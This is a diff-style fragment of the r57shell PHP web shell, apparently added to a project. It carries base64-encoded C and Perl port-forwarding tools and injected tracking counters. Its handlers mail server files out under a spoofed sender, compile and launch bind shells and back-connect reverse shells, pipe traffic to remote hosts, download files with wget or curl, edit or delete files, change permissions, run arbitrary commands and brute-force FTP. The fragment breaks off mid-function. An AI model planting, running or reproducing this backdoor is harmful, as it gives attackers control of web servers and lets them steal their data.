+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}}  
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); 
+ mr($language,$res);
+ $_POST['cmd']="";  
+ }
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {  
+ if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }
+ else 
+  {     
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    mr($language,$res);
+    $_POST['cmd']="";                           
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10); 
+ if(!$connection) { fe($language,0); }
+ else 
+  {     
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
+  else 
+   {    
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);      }
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);     }
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10); 
+ if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }      
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){ 
